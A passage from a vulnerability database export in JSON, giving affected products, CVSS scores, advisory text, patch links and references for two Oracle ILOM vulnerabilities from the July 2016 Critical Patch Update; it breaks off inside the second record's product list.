"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1.3.0"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.43"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4.2"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2.0.0"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "websphere application server liberty pr",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.0-"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "websphere application server liberty profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.8"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.7"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.1"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.5"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"model": "netscaler t1",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler service delivery appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler application delivery controller",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "command center appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "cloudbridge",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:oracle:integrated_lights_out_manager_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oracle",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
}
],
"trust": 0.6
},
"cve": "CVE-2016-5445",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2016-5445",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-94264",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2016-5445",
"impactScore": 3.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-5445",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-5445",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201607-809",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-94264",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-5445",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94264"
},
{
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the \u0027Multiple\u0027 protocol. The \u0027Authentication\u0027 sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-5445"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
},
{
"db": "VULHUB",
"id": "VHN-94264"
},
{
"db": "VULMON",
"id": "CVE-2016-5445"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-5445",
"trust": 2.9
},
{
"db": "BID",
"id": "91787",
"trust": 1.5
},
{
"db": "BID",
"id": "91991",
"trust": 1.5
},
{
"db": "SECTRACK",
"id": "1036408",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-94264",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-5445",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94264"
},
{
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"id": "VAR-201607-0652",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-94264"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T22:52:51.009000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
},
{
"title": "July 2016 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
},
{
"title": "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63169"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"trust": 1.3,
"url": "http://www.securityfocus.com/bid/91991"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/91787"
},
{
"trust": 1.2,
"url": "http://www.securitytracker.com/id/1036408"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5445"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5445"
},
{
"trust": 0.3,
"url": "http://www.oracle.com"
},
{
"trust": 0.3,
"url": "http://support.citrix.com/article/ctx216642"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984819"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988710"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/index.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=47152"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94264"
},
{
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-94264"
},
{
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-21T00:00:00",
"db": "VULHUB",
"id": "VHN-94264"
},
{
"date": "2016-07-21T00:00:00",
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"date": "2016-07-15T00:00:00",
"db": "BID",
"id": "91787"
},
{
"date": "2016-07-19T00:00:00",
"db": "BID",
"id": "91991"
},
{
"date": "2016-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"date": "2016-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"date": "2016-07-21T10:14:59.303000",
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-94264"
},
{
"date": "2017-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2016-5445"
},
{
"date": "2018-10-15T09:00:00",
"db": "BID",
"id": "91787"
},
{
"date": "2016-07-19T00:00:00",
"db": "BID",
"id": "91991"
},
{
"date": "2016-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003873"
},
{
"date": "2016-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201607-809"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-5445"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oracle Sun Systems Products Suite of ILOM In Authentication Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003873"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "91991"
}
],
"trust": 0.6
}
}
VAR-201607-0655
Vulnerability from variot - Updated: 2025-04-13 22:29Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity and availability via vectors related to SNMP. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'SNMP' protocol. The 'SNMP' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker could exploit this vulnerability to update, insert, or delete data, possibly causing a denial of service. Affect data integrity and availability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0655",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.1"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.0"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.092"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.091"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7.0101"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6.0115"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.092"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.091"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7.0101"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6.0115"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.16"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.14"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.13"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.12"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.11"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.10"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.9"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.8"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.18"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0"
},
{
"model": "utilities work and asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.9.1.2.8"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.3.5"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.2.12"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.1.16"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.11.0.5.4"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.11.0.4.41"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.10.0.6.27"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.0.0.0"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.4.1"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.4"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.5"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.4"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.3"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.2"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.1"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.7"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.6"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "switch es1-24",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.3"
},
{
"model": "sun network qdr infiniband gateway switch",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "sun network 10ge switch 72p",
"scope": "eq",
